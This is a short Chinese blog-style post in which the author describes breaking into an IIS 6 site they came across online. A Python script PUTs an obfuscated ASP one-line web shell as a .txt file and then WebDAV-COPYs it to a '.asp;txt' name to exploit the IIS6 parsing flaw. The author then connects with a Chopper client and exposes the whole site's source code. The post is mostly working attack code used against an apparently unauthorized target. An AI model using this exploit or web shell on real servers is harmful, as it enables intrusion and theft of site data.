某天,在网上逛了逛发现了个iis 6站,http所有方法都开了。古老的iis6,存在文件解析漏洞。So。。。。。
使用py脚本进行put一个shell的txt文件,然后copy成.asp;txt
尾缀的新文件。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
| import urllib2 def iisput(): url="http://example.com/q.txt" data='<%Function MorfiCoder(Code)MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)End FunctionExecute MorfiCoder(")/*/z/*/(tseuqer lave")%>' req=urllib2.Request(url,data) req.get_method=lambda:'PUT' req=urllib2.urlopen(req)
def iiswrite(): url="http://example.com/q.txt" req=urllib2.Request(url) req.get_method=lambda:'COPY' req.add_header('Destination', 'http://example.com/q.asp;txt') req=urllib2.urlopen(req)
if __name__ == '__main__': iisput() print "Txt file put successfully" iiswrite() print "Copy txt to asp successfully"
|
菜刀连接,整站源码直接暴露出来了。
查看当前连接情况,发现已经沦落为跑马场了,所有没什么可玩的了。